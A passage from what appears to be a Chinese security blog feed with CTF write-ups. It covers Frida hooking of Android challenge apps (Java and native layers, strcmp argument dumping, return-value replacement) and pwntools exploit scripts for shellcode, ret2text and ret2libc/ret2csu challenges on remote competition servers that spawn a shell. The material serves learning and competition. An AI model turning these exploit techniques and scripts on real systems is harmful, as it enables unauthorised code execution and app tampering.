class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span class="hljs-string">'com.ad2001.frida0x7.MainActivity'</span>,{<br> <span class="hljs-attr">onMatch</span>:<span class="hljs-keyword">function</span> (<span class="hljs-params">MainActivity</span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook succse'</span>)<br><br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x7.Checker"</span>);<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span>_obj = <span class="hljs-title class_">Checker</span>.$new(<span class="hljs-number">600</span>,<span class="hljs-number">600</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">flag</span>(<span class="hljs-title class_">Checker</span>_obj)<br> }<br> })<br><br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><h2 id="Frida-0x8"><a href="#Frida-0x8" class="headerlink" title="Frida 0x8"></a>Frida 0x8</h2><h3 id="Hook-Native层中调用的函数并且读取传入的参数"><a href="#Hook-Native层中调用的函数并且读取传入的参数" class="headerlink" title="Hook Native层中调用的函数并且读取传入的参数"></a>Hook Native层中调用的函数并且读取传入的参数</h3><p>这个题目是针对native层的,对于Native层的函数Hook,我们使用如下模板</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(targetAddress, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'Entering '</span> + functionName);<br> <span class="hljs-comment">// Modify or log arguments if needed</span><br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'Leaving '</span> + functionName);<br> <span class="hljs-comment">// Modify or log return value if needed</span><br> }<br>});<br></code></pre></td></tr></table></figure><ul><li><code>Interceptor.attach</code>:将回调函数附加到指定的函数地址。<code>targetAddress</code> 应该是我们想要挂钩的本地函数的地址。</li><li><code>onEnter</code>:当挂钩的函数被调用时,调用此回调。它提供对函数参数 (<code>args</code>) 的访问。</li><li><code>onLeave</code>:当挂钩的函数即将退出时,调用此回调。它提供对返回值 (<code>retval</code>) 的访问。<br>需要获取targetAddress我们可以方便的使用如下API</li></ul><p>同时还可以使用如下的api</p><ol><li><code>Module.enumerateExports()</code><br>通过调用 Module.enumerateExports(),我们可以获取到导出函数的名称、地址以及其他相关信息。这些信息对于进行函数挂钩、函数跟踪或者调用其他函数都非常有用。</li><li><code>Module.getExportByName()</code><br>当我们知道要查找的导出项的名称但不知道其地址时,可以使用 Module.getExportByName()。通过提供导出项的名称作为参数,这个函数会返回与该名称对应的导出项的地址。</li><li><code>Module.findExportByName()</code><br>这与 Module.getExportByName() 是一样的。唯一的区别在于,如果未找到导出项,Module.getExportByName() 会引发异常,而 Module.findExportByName() 如果未找到导出项则返回 <code>null</code>。让我们看一个示例。</li><li><code>Module.getBaseAddress()</code><br>通过调用 Module.getBaseAddress() 函数,我们可以获取指定模块的基址地址,然后可以基于这个基址地址进行偏移计算,以定位模块内部的特定函数、变量或者数据结构</li><li><code>Module.enumerateImports()</code><br>通过调用 Module.enumerateImports() 函数,我们可以获取到指定模块导入的外部函数或变量的名称、地址以及其他相关信息。</li></ol><p><img src="/./assets/image-20240604144832222.png" alt="image-20240604144832222"></p><p><img src="/./assets/image-20240604144849140.png" alt="image-20240604144849140"></p><p>可以看到strcmp的第一个参数是我们的输入值,第二个参数是flag,所以想办法把这个函数给勾出来就可以了</p><p>我不是很清楚为什么我的enumerate没有回显</p><p><img src="/./assets/image-20240604150254748.png" alt="image-20240604150254748"></p><p>在我们用ida找到函数后可以使用get和find这两个api找到地址</p><p><img src="/./assets/image-20240604150008695.png" alt="image-20240604150008695"></p><p>getbase在于我们不知道他的函数名,找到基址后用ida看偏移,加上偏移就好了</p><p><img src="/./assets/image-20240604150146569.png" alt="image-20240604150146569"></p><p><img src="/./assets/image-20240604150221656.png" alt="image-20240604150221656"></p><p>做题顺序是获得了地址后就可以使用模板进行hook了</p><p>可以使用Memory.readUtf8String(args[0]);来获取我们的输入字符串,平且使用 if (input.includes(“111”))来判断</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> strcmp_adr = <span class="hljs-title class_">Module</span>.<span class="hljs-title function_">findExportByName</span>(<span class="hljs-string">"libc.so"</span>, <span class="hljs-string">"strcmp"</span>);<br> <span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(strcmp_adr, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> <span class="hljs-keyword">var</span> arg0 = <span class="hljs-title class_">Memory</span>.<span class="hljs-title function_">readUtf8String</span>(args[<span class="hljs-number">0</span>]); <span class="hljs-comment">// first argument</span><br> <span class="hljs-keyword">var</span> flag = <span class="hljs-title class_">Memory</span>.<span class="hljs-title function_">readUtf8String</span>(args[<span class="hljs-number">1</span>]); <span class="hljs-comment">// second argument</span><br> <span class="hljs-keyword">if</span> (arg0.<span class="hljs-title function_">includes</span>(<span class="hljs-string">"Hello"</span>)) {<br><br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Hookin the strcmp function"</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Input "</span> + arg0);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"The flag is "</span>+ flag);<br><br> }<br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <span class="hljs-comment">// Modify or log return value if needed</span><br> }<br> });<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><h2 id="Frida-0x9"><a href="#Frida-0x9" class="headerlink" title="Frida 0x9"></a>Frida 0x9</h2><h3 id="Hook修改native层程序返回值"><a href="#Hook修改native层程序返回值" class="headerlink" title="Hook修改native层程序返回值"></a>Hook修改native层程序返回值</h3><p>hook的模板</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(functionaddr, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> <br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <br> }<br>});<br></code></pre></td></tr></table></figure><p>可以看到在onLeave中有一个参数retval,这个retval,就是我们hook上的程序的返回值,我们可以使用retval.replace(val)来修改返回值。</p><p><img src="/./assets/image-20240604152917826.png" alt="image-20240604152917826"></p><p><img src="/./assets/image-20240604152943922.png" alt="image-20240604152943922"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> adr = <span class="hljs-title class_">Module</span>.<span class="hljs-title function_">findExportByName</span>(<span class="hljs-string">"liba0x9.so"</span>, <span class="hljs-string">"Java_com_ad2001_a0x9_MainActivity_check_1flag"</span>);<br> <span class="hljs-title class_">Interceptor</span>.<span class="hljs-title function_">attach</span>(adr, {<br> <span class="hljs-attr">onEnter</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">args</span>) {<br> },<br> <span class="hljs-attr">onLeave</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">retval</span>) {<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Origin retval : "</span>,retval);<br> retval.<span class="hljs-title function_">replace</span>(<span class="hljs-number">1337</span>);<br> }<br> });<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><h2 id="Frida-0xA"><a href="#Frida-0xA" class="headerlink" title="Frida 0xA"></a>Frida 0xA</h2><h3 id="调用native层中未被调用的方法"><a href="#调用native层中未被调用的方法" class="headerlink" title="调用native层中未被调用的方法"></a>调用native层中未被调用的方法</h3><p>模板:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> native_adr = <span class="hljs-keyword">new</span> <span class="hljs-title class_">NativePointer</span>(<address_of_the_native_function>);<br><span class="hljs-keyword">const</span> native_function = <span class="hljs-keyword">new</span> <span class="hljs-title class_">NativeFunction</span>(native_adr, <span class="hljs-string">'<return type>'</span>, [<span class="hljs-string">'argument_data_type'</span>]);<br><span class="hljs-title function_">native_function</span>(<<span class="hljs-variable language_">arguments</span>>);<br></code></pre></td></tr></table></figure><blockquote><p>让我逐行解释。</p><p>var<code> </code>native_adr = ``new<code> </code>NativePointer(<address_of_the_native_function>);</p><p>要在 Frida 中调用一个本地函数,我们需要一个 <code>NativePointer</code> 对象。我们应该将要调用的本地函数的地址传递给 <code>NativePointer</code> 构造函数。接下来,我们将创建 <code>NativeFunction</code> 对象,它表示我们想要调用的实际本地函数。它在本地函数周围创建一个 JavaScript 包装器,允许我们从 Frida 调用该本地函数。</p><p>const native_function = <code>new` `NativeFunction(native_adr, </code>‘<return type>‘<code>, [</code>‘argument_data_type’``]);</p><p>第一个参数应该是 <code>NativePointer</code> 对象,第二个参数是本地函数的返回类型,第三个参数是要传递给本地函数的参数的数据类型列表。现在我们可以像在 Java 空间中那样调用该方法了。</p><p>native_function(<arguments>);</p></blockquote><p>apk中没有什么有用的信息,看so文件他的主函数也没有有用的信息,但我们找到一个输出flag的函数,可以尝试调用它</p><p><img src="/./assets/image-20240604163528916.png" alt="image-20240604163528916"></p><p><img src="/./assets/image-20240604163651152.png" alt="image-20240604163651152"></p><p><img src="/./assets/image-20240604163702086.png" alt="image-20240604163702086"></p><h2 id="Frida-0xB"><a href="#Frida-0xB" class="headerlink" title="Frida 0xB"></a>Frida 0xB</h2><h3 id="更改Native层方法的汇编指令"><a href="#更改Native层方法的汇编指令" class="headerlink" title="更改Native层方法的汇编指令"></a>更改Native层方法的汇编指令</h3><p>x86指令集的frida使用模板:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> writer = <span class="hljs-keyword">new</span> <span class="hljs-title function_">X86Writer</span>(opcodeaddr);<br><span class="hljs-title class_">Memory</span>.<span class="hljs-title function_">protect</span>(opcodeaddr, <span class="hljs-number">0x1000</span>, <span class="hljs-string">"rwx"</span>);<br><span class="hljs-keyword">try</span> {<br> <br> writer.<span class="hljs-title function_">flush</span>();<br> <br>} <span class="hljs-keyword">finally</span> {<br> <br> writer.<span class="hljs-title function_">dispose</span>();<br>}<br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>[<a href="https://bbs.kanxue.com/thread-280758.htm#msg_header_h3_1">原创]Frida-Hook-Java层操作大全-Android安全-看雪-安全社区|安全招聘|kanxue.com</a></p>
<p>[<a href="https://bbs.kanxue.com/thread-280812.htm">原创]Frida-Hook-Native层操作大全-Android安全-看雪-安全社区|安全招聘|kanxue.com</a></p>
<h2 id="Frida-0x1"><a href="#Frida-0x1" class="headerlink" title="Frida 0x1"></a>Frida 0x1</h2><h3 id="修改函数返回值-给函数传自定义参数"><a href="#修改函数返回值-给函数传自定义参数" class="headerlink" title="修改函数返回值&amp;&amp;给函数传自定义参数"></a>修改函数返回值&amp;&amp;给函数传自定义参数</h3><p>程序的主要逻辑是调用一个random的函数,然后对我们的输入进行检测是否是数字,如果是就使用check函数对随机数和我们输入的数进行对比,如果正确则输出flag</p>
<p><img src="/./assets/image-20240603150155414.png" alt="image-20240603150155414"></p>
<p>对于hook来讲,可以直接hookr random使其固定返回一个值,活着hook check函数,手动传入值</p>
<blockquote>
<ul>
<li><code>Java.perform</code> 是 Frida 中用于创建一个特殊上下文的函数,让你的脚本能够与 Android 应用程序中的 Java 代码进行交互。它就像是打开了一扇门,让你能够访问并操纵应用程序内部运行的 Java 代码。一旦进入这个上下文,你就可以执行诸如钩取方法或访问 Java 类等操作来控制或观察应用程序的行为。</li>
<li><code>var &lt;class_reference&gt; = Java.use(&quot;&lt;package_name&gt;.&lt;class&gt;&quot;);</code><br>在这里,你声明一个变量 <code>&lt;class_reference&gt;</code> 来表示目标 Android 应用程序中的一个 Java 类。你使用 <code>Java.use</code> 函数指定要使用的类,该函数接受类名作为参数。<code>&lt;package_name&gt;</code> 表示 Android 应用程序的包名,<code>&lt;class&gt;</code> 表示你想要与之交互的类。</li>
<li><code>&lt;class_reference&gt;.&lt;method_to_hook&gt;.implementation = function(&lt;args&gt;) &#123;&#125;</code><br>在所选的类内部,通过 <code>&lt;class_reference&gt;.&lt;method_to_hook&gt;</code> 符号访问你想要钩取的方法。这是你可以定义自己的逻辑以在钩取的方法被调用时执行的地方。<code>&lt;args&gt;</code> 表示传递给函数的参数。</li>
</ul>
</blockquote>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>)&#123;<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">MainActivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">&quot;com.ad2001.frida0x1.MainActivity&quot;</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-property">get_random</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>)&#123;<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br> &#125;<br>&#125;<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook2</span>(<span class="hljs-params"></span>)&#123;<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Mainactivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">&#x27;com.ad2001.frida0x1.MainActivity&#x27;</span>);<br> <span class="hljs-title class_">Mainactivity</span>.<span class="hljs-property">check</span>.<span class="hljs-title function_">overload</span>(<span class="hljs-string">&#x27;int&#x27;</span>,<span class="hljs-string">&#x27;int&#x27;</span>).<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params">a,b</span>)&#123;<br> a=<span class="hljs-number">0</span>;<br> b=<span class="hljs-number">4</span>;<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;i1 and i2 = &quot;</span>,a,b);<br> <span class="hljs-keyword">return</span> <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">check</span>(a,b);<br> &#125;<br>&#125;<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>)&#123;<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>)&#123;<br> <span class="hljs-title function_">hook</span>();<br> &#125;)<br>&#125;<br><br><span class="hljs-title function_">setImmediate</span>(main);<br></code></pre></td></tr></table></figure></summary>
</entry>
<entry>
<title>奇怪的wp</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/10/08/%E5%A5%87%E6%80%AA%E7%9A%84wp/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/10/08/%E5%A5%87%E6%80%AA%E7%9A%84wp/</id>
<published>2023-10-08T13:14:04.000Z</published>
<updated>2023-12-18T05:35:48.007Z</updated>
<content type="html"><![CDATA[<h4 id="PWN1"><a href="#PWN1" class="headerlink" title="PWN1"></a>PWN1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># p = process('./ezshellcode')</span><br>p = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">30213</span>)<br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><br><br><br>p.recvuntil(<span class="hljs-string">b'my heart'</span>)<br>p.sendline(<span class="hljs-string">b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaSyclover'</span>)<br><br>p.recvuntil(<span class="hljs-string">b'challege!'</span>)<br>p.recvline()<br>p.recvline()<br>a=p.recvline().decode(<span class="hljs-string">'utf-8'</span>)<br>a = a[<span class="hljs-number">0</span>:-<span class="hljs-number">3</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-number">6666666666</span>)<br><span class="hljs-built_in">print</span>(a)<br>r = <span class="hljs-built_in">eval</span>(a)<br>p.sendline(<span class="hljs-built_in">str</span>(r))<br>p.interactive()<br></code></pre></td></tr></table></figure><h2 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h2><p>PIE手动爆破,填充数据不是0x50</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">'debug'</span><br><br><span class="hljs-comment"># context.terminal = ['gnome-terminal', '-x', 'sh', '-c']</span><br><span class="hljs-comment"># r = gdb.debug('./ret2text')</span><br><span class="hljs-comment"># r = process('./ret2text')</span><br><br>r = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31949</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br> gdb.attach(r)<br> pause()<br>elf = ELF(<span class="hljs-string">'ret2text'</span>)<br>se = <span class="hljs-keyword">lambda</span> data :r.send(data)<br>sa = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>sl = <span class="hljs-keyword">lambda</span> data :r.sendline(data)<br>sla = <span class="hljs-keyword">lambda</span> delim,data :r.sendlineafter(delim, data)<br>sea = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>rc = <span class="hljs-keyword">lambda</span> numb=<span class="hljs-number">4096</span> :r.recv(numb)<br>rl = <span class="hljs-keyword">lambda</span> :r.recvline()<br>ru = <span class="hljs-keyword">lambda</span> delims :r.recvuntil(delims)<br>uu32 = <span class="hljs-keyword">lambda</span> data :u32(data.ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\0'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> data :u64(data.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b'\0'</span>))<br>lic = <span class="hljs-keyword">lambda</span> data :uu64(ru(data)[-<span class="hljs-number">6</span>:])<br>padding = <span class="hljs-keyword">lambda</span> lenth :<span class="hljs-string">b'Yhuan'</span>*(lenth//<span class="hljs-number">5</span>)+<span class="hljs-string">b'Y'</span>*(lenth % <span class="hljs-number">5</span>)<br>it = <span class="hljs-keyword">lambda</span> :r.interactive()<br><br>pad = p64(<span class="hljs-number">0</span>)*<span class="hljs-number">9</span> + p64(<span class="hljs-number">1</span>)<br>backdoor = <span class="hljs-string">b'\x27\xA2'</span><br><br>pl1 = pad + p64(<span class="hljs-number">0</span>) + backdoor<br>se(pl1)<br><br>r.interactive()<br></code></pre></td></tr></table></figure><span id="more"></span> <h2 id="ret2libc"><a href="#ret2libc" class="headerlink" title="ret2libc"></a>ret2libc</h2><p>libcsearcher</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#coding:utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span>*<br><span class="hljs-comment"># sh = process('./chal')</span><br>sh = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31971</span>)<br>elf = ELF(<span class="hljs-string">'./chal'</span>)<br><span class="hljs-comment"># libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')</span><br><span class="hljs-comment"># libc = ELF('../../tools/libc-database/db/libc6_2.23-0ubuntu10_amd64.so')</span><br><span class="hljs-comment"># libc = ELF('libc.so.6')</span><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><span class="hljs-comment"># context.terminal = ['tmux','splitw','-h']</span><br>gadgets1 = <span class="hljs-number">0x000000000040132A</span><br>gadgets2 = <span class="hljs-number">0x0000000000401310</span><br>write_got = elf.got[<span class="hljs-string">'write'</span>]<br>main_addr = elf.symbols[<span class="hljs-string">'main'</span>]<br>offset = <span class="hljs-string">b'\0'</span>*(<span class="hljs-number">0x10</span>+<span class="hljs-number">8</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">csu</span>(<span class="hljs-params">r12,r13,r14,r15,ret_addr</span>):<br> payload = offset<br> payload += p64(gadgets1)<br> <span class="hljs-comment"># payload += b"\0"*8</span><br> payload += p64(<span class="hljs-number">0</span>)<br> payload += p64(<span class="hljs-number">1</span>)<br> payload += p64(r12)<br> payload += p64(r15)<br> payload += p64(r14)<br> payload += p64(r13)<br> payload += p64(gadgets2) <br> payload += <span class="hljs-string">b"\0"</span>*<span class="hljs-number">56</span><br> payload += p64(ret_addr)<br> sh.sendline(payload)<br><span class="hljs-comment"># sh.recvuntil("this\n")</span><br>csu(<span class="hljs-number">1</span>,write_got,<span class="hljs-number">8</span>,write_got,main_addr)<br>write_addr = u64(sh.recvuntil(<span class="hljs-string">b'\x7f'</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b'\0'</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(write_addr))<br><span class="hljs-comment"># offset_addr = write_addr - libc.symbols['write']</span><br><span class="hljs-comment"># success("offset_addr = 0x%x",offset_addr)</span><br>libc = LibcSearcher(<span class="hljs-string">'write'</span>,write_addr)<br>base = write_addr - libc.dump(<span class="hljs-string">'write'</span>)<br>system = base + libc.dump(<span class="hljs-string">'system'</span>)<br>binsh = base + libc.dump(<span class="hljs-string">'str_bin_sh'</span>)<br><span class="hljs-comment"># print("123"+libc.dump('str_bin_sh'))</span><br><span class="hljs-comment"># system_addr = offset_addr + libc.symbols['system']</span><br><span class="hljs-comment"># print("execve:",hex(system_addr))</span><br><span class="hljs-comment"># binsh_address = next(libc.search(b'/bin/sh\x00'))</span><br><span class="hljs-comment"># print("binsh:",hex(binsh_address))</span><br><span class="hljs-comment">#gdb.attach(sh)</span><br>sh.recvuntil(<span class="hljs-string">"this\n"</span>)<br>payload = offset<br>payload+= p64(<span class="hljs-number">0x000000000040101a</span>)<span class="hljs-comment">#ret_addr</span><br>payload+= p64(<span class="hljs-number">0x0000000000401333</span>)<span class="hljs-comment"># pop_rdi_ret</span><br>payload+= p64(binsh)<br>payload+= p64(system)<br>sh.sendline(payload)<br>sh.interactive()<br></code></pre></td></tr></table></figure><p>提供的libc做</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 